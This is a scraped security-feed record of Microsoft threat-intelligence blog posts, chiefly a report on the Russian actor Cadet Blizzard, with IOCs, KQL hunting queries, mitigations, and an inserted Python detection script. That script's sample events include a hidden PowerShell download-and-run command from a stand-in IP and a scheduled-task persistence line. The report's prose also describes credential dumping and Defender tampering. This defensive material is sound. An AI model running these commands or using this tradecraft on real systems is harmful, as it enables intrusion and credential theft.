[Microsoft Defender External Attack Surface Management](<https://www.microsoft.com/en-us/security/business/cloud-security/microsoft-defender-external-attack-surface-management>) continuously discovers and maps your digital attack surface to provide an external view of your online infrastructure. Attack Surface Insights are generated by leveraging vulnerability and infrastructure data to showcase the key areas of concern for your organization.

A High Severity Observation has been published to surface assets within an attack surface which should be examined for application of the mitigation steps described above. This insight, titled _CVE-2022-41082 & CVE-2022-41040 - Microsoft Exchange Server Authenticated SSRF and PowerShell RCE_, can be found under the high severity observations section of the Attack Surface Summary dashboard.

The post [Analyzing attacks using the Exchange vulnerabilities CVE-2022-41040 and CVE-2022-41082](<https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).

Source record: “Analyzing attacks using the Exchange vulnerabilities CVE-2022-41040 and CVE-2022-41082”, Microsoft Security Blog (record type mmpc, id MMPC:C857BFAD4920FD5B25BF42D5469945F6), published and modified 2022-10-01T04:21:00, <https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/>. CVSS v3.1 base score 8.8 (HIGH), vector CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H (exploitability score 2.8, impact score 5.9). CVEs: CVE-2022-41040, CVE-2022-41082.

Next record (last seen 2023-06-23T23:55:14):

As Russia’s invasion of Ukraine continues into its second year and Microsoft continues to collaborate with global partners in response, the exposure of destructive cyber capabilities and information operations provides greater clarity into the tools and techniques used by Russian state-sponsored threat actors.
Throughout the conflict, Russian threat actors have deployed a variety of destructive capabilities with varying levels of sophistication and impact, which showcase how malicious actors rapidly implement novel techniques during a hybrid war, along with the practical limitations of executing destructive campaigns when significant operational errors are made and the security community rallies around defense. These insights help security researchers continuously refine detection and mitigation capabilities to defend against such attacks as they evolve in a wartime environment.

Today, Microsoft Threat Intelligence is sharing updated details about techniques of a threat actor formerly tracked as [DEV-0586](<https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/>)—a distinct Russian state-sponsored threat actor that has now been elevated to the name Cadet Blizzard. As a result of our investigation into their intrusion activity over the past year, we have gained high confidence in our analysis and knowledge of the actor’s tooling, victimology, and motivation, meeting the criteria to convert this group to a [named threat actor](<https://www.microsoft.com/security/blog/2023/04/18/microsoft-shifts-to-a-new-threat-actor-naming-taxonomy/>).

Microsoft assesses that Cadet Blizzard operations are [associated with the Russian General Staff Main Intelligence Directorate (GRU)](<https://blogs.microsoft.com/on-the-issues/2023/06/14/russian-cyberattacks-ukraine-cadet-blizzard/>) but are separate from other known and more established GRU-affiliated groups such as Forest Blizzard (STRONTIUM) and Seashell Blizzard (IRIDIUM). While Microsoft constantly tracks a number of activity groups with varying degrees of Russian government affiliation, the emergence of a novel GRU-affiliated actor, particularly one which has conducted destructive cyber operations likely supporting broader military objectives in Ukraine, is a notable development in the Russian cyber threat landscape. A month before Russia invaded Ukraine, Cadet Blizzard foreshadowed future destructive activity when it created and deployed [WhisperGate](<https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/>), a destructive capability that wipes Master Boot Records (MBRs), against Ukrainian government organizations. Cadet Blizzard is also linked [to the defacements](<https://www.npr.org/2022/01/14/1073001754/ukraine-cyber-attack-government-websites-russia>) of several Ukrainian organization websites, as well as multiple operations, including the hack-and-leak forum known as “Free Civilian”.

Microsoft has tracked Cadet Blizzard since the deployment of WhisperGate in January 2022. We assess that they have been operational in some capacity since at least 2020 and continue to perform network operations through the present. Operationally consistent with the remit and assessed objectives of GRU-led operations throughout Russia’s invasion of Ukraine, Cadet Blizzard has engaged in focused destructive attacks, espionage, and information operations in regionally significant areas. Cadet Blizzard’s operations, though comparatively less prolific in both scale and scope than those of more established threat actors such as Seashell Blizzard, are structured to deliver impact and frequently run the risk of hampering continuity of network operations and exposing sensitive information through targeted hack-and-leak operations. Primary targeted sectors include government organizations and information technology providers in Ukraine, although organizations in Europe and Latin America have also been targeted.

Microsoft has been [working with CERT-UA](<https://blogs.microsoft.com/on-the-issues/2022/11/03/our-tech-support-ukraine/#:~:text=Since%20the%20war%20began%20in%20February%2C%20Microsoft%20and,critical%20Ukrainian%20services%20through%20data%20centers%20across%20Europe.>) closely since the beginning of Russia’s war in Ukraine and continues to support the country and neighboring states in protecting against cyberattacks, such as the ones carried out by Cadet Blizzard. As with any observed nation-state actor activity, Microsoft directly and proactively notifies customers that have been targeted or compromised, providing them with the information they need to guide their investigations. Microsoft is also actively working with members of the global security community and other strategic partners to share information that can address this evolving threat through multiple channels. Having elevated this activity to a distinct threat actor name, we’re sharing this information with the larger security community to provide insights to protect and mitigate Cadet Blizzard as a threat. Organizations should actively take steps to protect environments against Cadet Blizzard, and this blog further aims to discuss how to detect and prevent disruption.

## Who is Cadet Blizzard?

Cadet Blizzard is a Russian GRU-sponsored threat group that Microsoft began tracking following disruptive and destructive events occurring at multiple government agencies in Ukraine in mid-January 2022. During this time, Russian troops backed with tanks and artillery were surrounding the Ukrainian border as the military prepped for an offensive attack. The [defacements](<https://www.npr.org/2022/01/14/1073001754/ukraine-cyber-attack-government-websites-russia>) of key Ukrainian institutions’ websites, coupled with the WhisperGate malware, prefaced [multiple waves of attacks](<https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd>) by Seashell Blizzard that followed when the Russian military began their ground offensive a month later.

Cadet Blizzard compromises and maintains a foothold on affected networks for months, often exfiltrating data prior to disruptive actions. Microsoft observed Cadet Blizzard’s activity peak between January and June 2022, followed by an extended period of reduced activity. The group re-emerged in January 2023 with increased operations against multiple entities in Ukraine and in Europe, including another round of website defacements and a new “Free Civilian” Telegram channel affiliated with the hack-and-leak front under the same name that first emerged in January 2022, around the same time as the initial defacements. Cadet Blizzard actors are active seven days a week and have conducted their operations during their primary European targets’ off-business hours. Microsoft assesses that NATO member states involved in providing military aid to Ukraine are at greater risk.

Figure 1. A heatmap of the operational cadence of Cadet Blizzard

Cadet Blizzard seeks to conduct disruption, destruction, and information collection, using whatever means are available and sometimes acting in a haphazard fashion. While the group carries high risk due to their destructive activity, they appear to operate with a lower degree of operational security than that of longstanding and advanced Russian groups such as Seashell Blizzard and Forest Blizzard. Additionally, as is the case with other Russian state-sponsored threat groups, Microsoft assesses that at least one Russian private sector organization has materially supported Cadet Blizzard by providing operational support, including during the WhisperGate destructive attack.

### Targets

Cadet Blizzard’s operations are global in scope but consistently affect regional hotspots in Ukraine, Europe, Central Asia, and, periodically, Latin America. Cadet Blizzard likely prioritizes target networks based on requirements consistent with Russian military or intelligence objectives such as geolocation or perceived impact. Cadet Blizzard, consistent with a Russian military-associated threat actor, continues to mainly target Ukraine, although the relative scope of impact of Cadet Blizzard’s destructive activity is minimal compared to the multiple waves of destructive attacks that we attribute to Seashell Blizzard. In January 2022, Cadet Blizzard launched destructive attacks in Ukraine in the following industry verticals:

 * Government services
 * Law enforcement
 * Non-profit/non-governmental organizations
 * IT service providers/consulting
 * Emergency services

Cadet Blizzard has repeatedly targeted information technology providers and software developers that provide services to government organizations using a supply chain “compromise one, compromise many” technique. The group’s January 2022 compromise of government entities in Ukraine was probably at least in part due to access and information gained during a breach of an information technology provider that often worked with these organizations.

Prior to the war in Ukraine, Cadet Blizzard performed historical compromises of several Eastern European entities as well, primarily affecting the government and technology sectors as early as April 2021. As the war continues, Cadet Blizzard activity poses an increasing risk to the broader European community, specifically any successful attacks against governments and IT service providers, which may give the actor both tactical and strategic-level insight into Western operations and policy surrounding the conflict. Gaining heightened levels of access into these targeted sectors may also enable Cadet Blizzard to carry out retaliatory demonstrations in opposition to the West’s support for Ukraine.

### Tools, tactics, and procedures

Cadet Blizzard is a conventional network operator and commonly utilizes living-off-the-land techniques after gaining initial access to move laterally through the network, collect credentials and other information, and deploy defense evasion techniques and persistence mechanisms. Unlike other Russian-affiliated groups that historically prefer to remain undetected to perform espionage, the results of at least some notable Cadet Blizzard operations are extremely disruptive and are almost certainly intended to be public signals to their targets to achieve the larger objective of destruction, disruption, and possibly, intimidation.

Figure 2. Cadet Blizzard's normal operational lifecycle

**Initial access**

Cadet Blizzard predominantly achieves initial access through exploitation of web servers commonly found on network perimeters and DMZs. Cadet Blizzard is also known for exploiting Confluence servers through the CVE-2021-26084 vulnerability, Exchange servers through multiple vulnerabilities including CVE-2022-41040 and ProxyShell, and likely commodity vulnerabilities in various open-source platforms such as content management systems.

**Persistence**

Cadet Blizzard frequently persists on target networks through the deployment of commodity web shells used either for commanding or tunneling.
Commonly utilized web shells include [P0wnyshell](<https://github.com/flozz/p0wny-shell>), [reGeorg](<https://github.com/sensepost/reGeorg>), PAS, and even custom variants included in publicly available exploit kits.

In February 2023, [CERT-UA reported](<https://cert.gov.ua/article/3947787>) an attempted attack against a Ukrainian state information system that involved a variant of the PAS web shell, which Microsoft assesses to be unique to Cadet Blizzard operations at the time of the intrusion.

**Privilege escalation and credential harvesting**

Cadet Blizzard has leveraged a variety of living-off-the-land techniques to conduct privilege escalation and harvesting of credentials.

 * Dumping LSASS – Cadet Blizzard uses Sysinternals tools such as _procdump_ to dump LSASS in suspected offline credential harvesting efforts. Cadet Blizzard frequently renames _procdump64_ to alternative names, such as _dump64.exe_.
 * Dumping registry hives – Cadet Blizzard extracts registry hives using native means via _reg save_.

**Lateral movement**

Cadet Blizzard conducts lateral movement with valid network credentials obtained from credential harvesting. To conduct lateral movement more efficiently, Cadet Blizzard typically uses modules from the publicly available [Impacket framework](<https://github.com/fortra/impacket>). While this framework is generically utilized by multiple actors, preferential execution of patterns of commands may allow for more precise profiling of Cadet Blizzard operations:

 * PowerShell _get-volume_ to enumerate the volumes of a device

Figure 3. PowerShell _get-volume_ command

 * Copying critical registry hives that contain password hashes and computer information

Figure 4. Copying critical registry hives

 * Downloading files directly from actor-owned infrastructure via the PowerShell _DownloadFile_ commandlet

Figure 5. PowerShell _DownloadFile_ commandlet

**Command execution and C2**

Cadet Blizzard periodically uses generic socket-based tunneling utilities to facilitate command and control (C2) to actor-controlled infrastructure. Payloads such as Netcat and Go Simple Tunnel (GOST) are commonly renamed to blend into the operating system but are used to shovel interactive command prompts over established sockets. Frequently, remote command execution may be facilitated through remotely scheduled tasks. The group has also sparingly utilized Meterpreter.

Figure 6. Scheduled task creating a reverse shell

**Operational security**

Cadet Blizzard uses the anonymization services IVPN, SurfShark, and Tor as its anonymization layer during select operations.

**Anti-forensics**

Cadet Blizzard has been observed leveraging the _Win32_NTEventlogFile_ commandlet in PowerShell to extract both system and security event logs to an operational directory. This activity is expected to be consistent with anti-forensics.

 * Common file targets during extraction are:
   * _sec.evtx_
   * _sys.evtx_
 * Cadet Blizzard commonly deletes files used during operational phases seen in lateral movement.
 * Cadet Blizzard malware implants are known to disable Microsoft Defender Antivirus through a variety of means:
   * _NirSoft AdvancedRun_ utility, which is used to disable Microsoft Defender Antivirus by stopping the _WinDefend_ service.
   * _Disable Windows Defender.bat_, which presumably disables Microsoft Defender Antivirus via the registry.

Figure 7. Addition of registry key to disable Microsoft Defender Antivirus

**Impact assessment**

Cadet Blizzard typically collects information en masse from targeted servers. If mail servers are affected, Cadet Blizzard typically attempts to collect mail, placing incident response communications at risk. Credential material (such as SSH keys) is also a common target, providing methods for re-entry if a full remediation does not occur. As was the case with the WhisperGate operation in January 2022, Cadet Blizzard is known to deploy destructive malware to select target environments to delete data and render systems inoperable.

Also in January of 2022, Microsoft identified that data exfiltrated by Cadet Blizzard in compromises of various Ukrainian organizations was leaked on a Tor .onion site under the name “Free Civilian.” The organizations from which data was leaked strongly correlated to multiple Cadet Blizzard compromises earlier in 2022, leading Microsoft to assess that this forum is almost certainly linked to Cadet Blizzard. In February 2023, a new Telegram channel was established under the same “Free Civilian” moniker, suggesting that Cadet Blizzard intends to continue conducting information operations in the second year of the war. However, the public channel only has 1.3K followers, with posts getting at most a dozen reactions as of the time of publication, signifying low user interaction. A private channel assumed to be operated by the same group appears to have shared data with 748 of those subscribers.

Figure 8. Free Civilian hack-and-leak front

### Related ecosystems

Cadet Blizzard operations do not occur in a silo; there have been substantial technical indicators of intersection with other malicious cyber activity that may have a broader scope or a nexus outside of Russia. They have at times utilized services associated with these ecosystems such as Storm-0587, discussed below, as well as having support from at least one private sector enabler organization within Russia. Though there have been various forms of intersections in threat activity, when these groups have been observed operating independently, the tactics, techniques, procedures (TTPs) and capabilities have often been distinct—therefore making it operationally valuable to distinguish these activity groups.

**Storm-0587**

Storm-0587 is a cluster of activity, beginning as early as April 2021, involving a series of weaponized documents predominantly delivered in phishing operations, usually to distribute a series of downloaders and [document stealers](<https://intezer.com/blog/malware-analysis/targeted-phishing-attack-against-ukrainian-government-expands-to-georgia/>). One of Storm-0587's trademark tools is [SaintBot](<https://www.malwarebytes.com/blog/threat-intelligence/2021/04/a-deep-dive-into-saint-bot-downloader>), an uncommon downloader that often appears in spear-phishing emails. This downloader can be customized to deploy almost anything as the payload, but in Ukraine, the malware often deploys a version of an [AutoIT information stealer](<https://gist.github.com/malwarezone/119bed274bc77b52122fa118f0a72618#file-stealer-au3-L2880>) that collects documents on the machine that threat actors deem of interest. This specific version of the malware has been named [OUTSTEEL by CERT UA](<https://cert.gov.ua/article/18419>) and has been observed in several attacks, such as a fake version of the Office of the President of Ukraine’s website created in July 2021 that hid weaponized documents, including OUTSTEEL, that would download onto victims’ machines when the documents were clicked.

## Mitigation and protection guidance

### Defending against Cadet Blizzard

Activities linked to Cadet Blizzard indicate that they are comprehensive in their approach and have demonstrated an ability to hold networks at risk of continued compromise for an extended period of time. A comprehensive approach to incident response may be required in order to fully remediate Cadet Blizzard operations. Organizations can bolster security of information assets and expedite incident response by focusing on areas of risk based on actor tradecraft enumerated within this report. Use the included indicators of compromise to investigate environments and assess for potential intrusion.

 * Review all authentication activity for remote access infrastructure, with a particular focus on accounts configured with single-factor authentication, to confirm authenticity and investigate any anomalous activity.
 * Enable multifactor authentication (MFA) to mitigate potentially compromised credentials and ensure that MFA is enforced for all remote connectivity. _NOTE:_ Microsoft strongly encourages all customers to download and use password-less solutions like [Microsoft Authenticator](<https://www.microsoft.com/account/authenticator/>) to secure accounts.
 * Enable [controlled folder access (CFA)](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/controlled-folders>) to prevent MBR/VBR modification.
 * [Block process creations originating from PSExec and WMI commands](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-reference#block-process-creations-originating-from-psexec-and-wmi-commands>) to stop lateral movement utilizing the WMIexec component of Impacket.
 * Turn on [cloud-delivered protection](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus>) in Microsoft Defender Antivirus, which is turned on by default in Windows, or the equivalent for your chosen antivirus product to cover rapidly evolving attacker tools and techniques.
Cloud-based machine learning protections block a huge majority of new and unknown variants.\n\n### Hunting for Cadet Blizzard hands-on-keyboard activity\n\nTo uncover malicious hands-on-keyboard activities in environments, identify any unusual or unexpected commands or tools launched on systems as well as the presence of any unusual directories or files that could be used for staging or storing malicious tools. Use the common commands, tools, staging directories, and indicators of compromise listed below to help identify Cadet Blizzard intrusion and hands-on-keyboard activity in environments.\n\n**Common commands**\n\n * _systeminfo_ to fingerprint a device after lateral movement\n * _get-volume_ to fingerprint a device after lateral movement\n * _nslookup_ to research specific devices (IP) and FQDNs internally\n * _Get-DnsServerResourceRecord_ to conduct reconnaissance of an internal DNS namespace\n * _query session_ to profile RDP connections\n * _route print_ to enumerate routes available on the devices\n * _DownloadFile_ via PowerShell to download payloads from external servers\n\n**Common tool staging directories**\n\n * _C:\\ProgramData_\n * _C:\\PerfLogs_\n * _C:\\Temp_\n * _C:\\_\n * Subdirectories of legitimate (or fake) user accounts within _%APPDATA%\\Temp_\n * Subdirectories with the name _USOPublic _in the path\n\n**Common tools**\n\n * Tor\n * Python\n * SurfShark\n * Teamviewer\n * Meterpreter named as _dbus-rpc.exe_ in known instances\n * IVPN\n * NGROK\n * _GOST.exe_ frequently masked as _USORead.exe_****\n * regeorg web shell\n\n**Indicators of compromise (IOCs)**\n\nIOC| Type| Description \n---|---|--- \njusticeua[.]org| Domain| Sender for non-weaponized emails containing only antagonistic messaging: _volodimir_azov@justiceua[.]org_ \n179.43.187[.]33| IP address| Hosted the JusticeUA operation between March and April 2022 \n3a2a2de20daa74d8f6921230416ed4e6| PE Import Hash| PE Import Hash matching WhisperGate malware 
\n3e4bb8089657fef9b8e84d9e17fd0d7740853c4c0487081dacc4f22359bade5c| SHA-256| Web shell - p0wnyshell (not unique to Cadet Blizzard) \n20215acd064c02e5aa6ae3996b53f5313c3f13625a63da1d3795c992ea730191| SHA-256| Web shell - p0wnyshell (not unique to Cadet Blizzard) \n3fe9214b33ead5c7d1f80af469593638b9e1e5f5730a7d3ba2f96b6b555514d4| SHA-256| Web shell - WSO Shell (not unique to Cadet Blizzard) \n23d6611a730bed886cc3b4ce6780a7b5439b01ddf6706ba120ed3ebeb3b1c478| SHA-256| Web shell \u2013 reGeorg (not unique to Cadet Blizzard) \n7fedaf0dec060e40cbdf4ec6d0fbfc427593ad5503ad0abaf6b943405863c897| SHA-256| Web shell \u2013 PAS (may not be unique to Cadet Blizzard) \n \n### Microsoft 365 Defender detections\n\n**Microsoft Defender Antivirus**\n\nMicrosoft Defender Antivirus detects behavioral components of techniques this threat actor uses as the following:\n\n * Behavior:Win32/WmiprvseRemoteProc\n\nMicrosoft Defender Antivirus detects the WhisperGate malware attributed to this threat actor with the following family:\n\n * WhisperGate\n\n**Microsoft Defender for Endpoint**\n\nThe following Microsoft Defender for Endpoint alerts can indicate associated threat activity:\n\n * Cadet Blizzard activity detected\n * Possible Storm-0587 activity detected\n\nThe following alerts might also indicate threat activity related to this threat. 
Note, however, that these alerts can also be triggered by unrelated threat activity.\n\n * Ongoing hands-on-keyboard attack via Impacket toolkit\n * Suspicious PowerShell command line\n * Suspicious WMI process creation\n\n**Microsoft Defender Vulnerability Management**\n\nMicrosoft Defender Vulnerability Management surfaces devices that may be affected by the following vulnerabilities used in this threat:\n\n * CVE-2021-26084\n * CVE-2020-1472\n * CVE-2021-4034\n\n### Hunting queries\n\n**Microsoft 365 Defender**\n\nMicrosoft 365 Defender customers can run the following queries to find related activity in their networks:\n\n**Check for WMIExec Impacket activity with common Cadet Blizzard commands**\n \n \n DeviceProcessEvents\n | where InitiatingProcessFileName =~ \"WmiPrvSE.exe\" and FileName =~ \"cmd.exe\"\n | where ProcessCommandLine matches regex \"2>&1\"\n | where ProcessCommandLine has_any (\"get-volume\",\"systeminfo\",\"reg.exe\",\"downloadfile\",\"nslookup\",\"query session\",\"route print\")\n \n\n**Find PowerShell file downloads**\n \n \n DeviceProcessEvents\n | where FileName == \"powershell.exe\" and ProcessCommandLine has \"DownloadFile\"\n \n\n**Scheduled task creation, command execution and C2 communication**\n \n \n DeviceProcessEvents \n | where Timestamp > ago(14d) \n | where FileName =~ \"schtasks.exe\" \n | where (ProcessCommandLine contains \"splservice\" or ProcessCommandLine contains \"spl32\") and \n (ProcessCommandLine contains \"127.0.0.1\" or ProcessCommandLine contains \"2>&1\")\n \n\n### Microsoft Sentinel\n\nMicrosoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with \u201cTI map\u201d) to automatically match indicators associated with Cadet Blizzard in Microsoft Defender Threat Intelligence (MDTI) with data in their workspace. 
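The three hunting queries above reduce to a few string predicates over process-creation records, and it helps to exercise them offline before deploying them. The following Python is an added example written for this page, not Microsoft's code and not part of the original post. It applies the same predicates as the queries (WmiPrvSE.exe spawning cmd.exe with a 2>&1 redirect plus one of the listed recon commands; powershell.exe with DownloadFile; schtasks.exe with the splservice/spl32 and 127.0.0.1/2>&1 pairs) and goes one step further than the queries by also flagging command lines that reference the staging directories and masked tool names from the hunting section above. The event records are constructed samples that borrow the DeviceProcessEvents column names; every host name, path, timestamp and address in them is invented.

```python
import re
from typing import Callable, Dict, List, Tuple

Event = Dict[str, str]

# Commands the hunting section lists as typical post-lateral-movement recon.
RECON_COMMANDS = ('get-volume', 'systeminfo', 'reg.exe', 'downloadfile',
                  'nslookup', 'query session', 'route print')

# Staging locations from the hunting section; c:\<name>.exe covers tools
# dropped directly in the root of C:\. Masked tool names are checked separately.
STAGING_RE = re.compile(
    r'c:\\(programdata|perflogs|temp)\\|c:\\[^\\\s]+\.exe|appdata\\temp\\|usopublic',
    re.IGNORECASE)
KNOWN_TOOL_NAMES = ('dbus-rpc.exe', 'usoread.exe', 'gost.exe')


def _lc(event: Event, column: str) -> str:
    return str(event.get(column, '')).lower()


def is_wmiexec_recon(event: Event) -> bool:
    # Impacket wmiexec runs commands via WmiPrvSE.exe -> cmd.exe and redirects
    # stderr into stdout (2>&1) so the output can be read back over SMB.
    cmd = _lc(event, 'ProcessCommandLine')
    return (_lc(event, 'InitiatingProcessFileName') == 'wmiprvse.exe'
            and _lc(event, 'FileName') == 'cmd.exe'
            and '2>&1' in cmd
            and any(recon in cmd for recon in RECON_COMMANDS))


def is_powershell_download(event: Event) -> bool:
    return (_lc(event, 'FileName') == 'powershell.exe'
            and 'downloadfile' in _lc(event, 'ProcessCommandLine'))


def is_scheduled_task_c2(event: Event) -> bool:
    cmd = _lc(event, 'ProcessCommandLine')
    return (_lc(event, 'FileName') == 'schtasks.exe'
            and ('splservice' in cmd or 'spl32' in cmd)
            and ('127.0.0.1' in cmd or '2>&1' in cmd))


def touches_staging_dir(event: Event) -> bool:
    cmd = _lc(event, 'ProcessCommandLine')
    return bool(STAGING_RE.search(cmd)) or any(t in cmd for t in KNOWN_TOOL_NAMES)


RULES: List[Tuple[str, Callable[[Event], bool]]] = [
    ('wmiexec_recon', is_wmiexec_recon),
    ('powershell_download', is_powershell_download),
    ('scheduled_task_c2', is_scheduled_task_c2),
    ('staging_dir', touches_staging_dir),
]


def hunt(events) -> List[Dict[str, object]]:
    # One hit per event that matches at least one rule, with all matching rule names.
    hits = []
    for event in events:
        matched = [name for name, check in RULES if check(event)]
        if matched:
            hits.append({'DeviceName': event.get('DeviceName', ''),
                         'ProcessCommandLine': event.get('ProcessCommandLine', ''),
                         'Rules': matched})
    return hits


# Constructed sample events (not real telemetry) using DeviceProcessEvents
# column names; hosts, paths and the 203.0.113.10 address are invented.
SAMPLE_PROCESS_EVENTS = [
    {'DeviceName': 'srv01', 'InitiatingProcessFileName': 'WmiPrvSE.exe', 'FileName': 'cmd.exe',
     'ProcessCommandLine': r'cmd.exe /Q /c systeminfo 1> \\127.0.0.1\ADMIN$\__1686758123.45 2>&1'},
    {'DeviceName': 'srv01', 'InitiatingProcessFileName': 'WmiPrvSE.exe', 'FileName': 'cmd.exe',
     'ProcessCommandLine': r'cmd.exe /Q /c route print 1> \\127.0.0.1\ADMIN$\__1686758130.12 2>&1'},
    {'DeviceName': 'ws07', 'InitiatingProcessFileName': 'explorer.exe', 'FileName': 'powershell.exe',
     'ProcessCommandLine': r'powershell.exe -nop -w hidden -c (New-Object Net.WebClient).DownloadFile("http://203.0.113.10/u.bin","C:\PerfLogs\dbus-rpc.exe")'},
    {'DeviceName': 'ws07', 'InitiatingProcessFileName': 'cmd.exe', 'FileName': 'schtasks.exe',
     'ProcessCommandLine': r'schtasks.exe /create /sc minute /mo 5 /tn splservice /tr "C:\Temp\spl32.exe > \\127.0.0.1\C$\o.txt 2>&1" /f'},
    # Benign look-alikes: a service host start and an interactive systeminfo.
    {'DeviceName': 'srv02', 'InitiatingProcessFileName': 'services.exe', 'FileName': 'svchost.exe',
     'ProcessCommandLine': 'svchost.exe -k netsvcs -p -s Schedule'},
    {'DeviceName': 'ws07', 'InitiatingProcessFileName': 'explorer.exe', 'FileName': 'cmd.exe',
     'ProcessCommandLine': 'cmd.exe /c systeminfo'},
]

if __name__ == '__main__':
    for hit in hunt(SAMPLE_PROCESS_EVENTS):
        print(hit['DeviceName'], hit['Rules'], hit['ProcessCommandLine'])
```

The interactive `cmd.exe /c systeminfo` at the end is deliberately left unflagged: the recon command alone is normal administrator behaviour, and it is the WmiPrvSE.exe parent together with the 2>&1 redirect that makes the first two records worth a look.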
If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the MDTI connector and analytics rule deployed in their Sentinel workspace. More details on the Content Hub can be found here: <https://learn.microsoft.com/azure/sentinel/sentinel-solutions-deploy>.\n\nMicrosoft Sentinel also has a range of detection and threat hunting content that customers can use to detect the post-exploitation activity detailed in this blog, in addition to the Microsoft 365 Defender detections listed above.\n\n * [Web Shell Activity](<https://github.com/Azure/Azure-Sentinel/blob/master/Solutions/Web Shells Threat Protection/Hunting Queries/WebShellActivity.yaml>)\n * [Commands executed by WMI](<https://github.com/Azure/Azure-Sentinel/blob/master/Solutions/Windows Security Events/Hunting Queries/CommandsexecutedbyWMIonnewhosts-potentialImpacket.yaml>)\n * [Potential Impacket Execution](<https://github.com/Azure/Azure-Sentinel/blob/master/Solutions/Attacker Tools Threat Protection Essentials/Hunting Queries/PotentialImpacketExecution.yaml>)\n * [Dumping LSASS using procdump](<https://github.com/Azure/Azure-Sentinel/blob/ccbb0e644810e0edf3b8ee4f284fd05ea1cc46ad/Hunting%20Queries/Microsoft%20365%20Defender/Credential%20Access/procdump-lsass-credentials.yaml>)\n * [Potential Microsoft Defender Tampering](<https://github.com/Azure/Azure-Sentinel/blob/c5e3281a8a30ea658ce8f8234a182a63ceb996d7/Hunting%20Queries/Microsoft%20365%20Defender/Defense%20evasion/PotentialMicrosoftDefenderTampering%5BSolarigate%5D.yaml>)\n\n### References\n\n * <https://www.npr.org/2022/01/14/1073001754/ukraine-cyber-attack-government-websites-russia>\n * <https://github.com/flozz/p0wny-shell>\n * <https://github.com/sensepost/reGeorg>\n * <https://cert.gov.ua/article/3947787>\n * <https://github.com/fortra/impacket>\n * 
<https://intezer.com/blog/malware-analysis/targeted-phishing-attack-against-ukrainian-government-expands-to-georgia/>\n\n## Further reading\n\nFor the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: <https://aka.ms/threatintelblog>.\n\nTo get notified about new publications and to join discussions on social media, follow us on Twitter at <https://twitter.com/MsftSecIntel>.\n\nThe post [Cadet Blizzard emerges as a novel and distinct Russian threat actor](<https://www.microsoft.com/en-us/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-distinct-russian-threat-actor/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/en-us/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-06-14T16:00:00", "type": "mmpc", "title": "Cadet Blizzard emerges as a novel and distinct Russian threat actor", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472", "CVE-2021-26084", "CVE-2021-4034", "CVE-2022-41040"], "modified": "2023-06-14T16:00:00", "id": 
"MMPC:1AFF4881941FA1030862F773DC84A4A8", "href": "https://www.microsoft.com/en-us/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-distinct-russian-threat-actor/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-07-18T21:01:53", "description": "As ransomware attacks continue to grow in number and sophistication, threat actors can quickly impact business operations if organizations are not well prepared. In a recent investigation by Microsoft Incident Response (previously known as Microsoft Detection and Response Team \u2013 DART) of an intrusion, we found that the threat actor progressed through the full attack chain, from initial access to impact, in less than five days, causing significant business disruption for the victim organization.\n\nOur investigation found that within those five days, the threat actor employed a range of tools and techniques, culminating in the deployment of BlackByte 2.0 ransomware, to achieve their objectives. These techniques included:\n\n * Exploitation of unpatched internet-exposed Microsoft Exchange Servers\n * Web shell deployment facilitating remote access\n * Use of living-off-the-land tools for persistence and reconnaissance\n * Deployment of Cobalt Strike beacons for command and control (C2)\n * Process hollowing and the use of vulnerable drivers for defense evasion\n * Deployment of custom-developed backdoors to facilitate persistence\n * Deployment of a custom-developed data collection and exfiltration tool\nFigure 1. BlackByte 2.0 ransomware attack chain\n\nIn this blog, we share details of our investigation into the end-to-end attack chain, exposing security weaknesses that the threat actor exploited to advance their attack. 
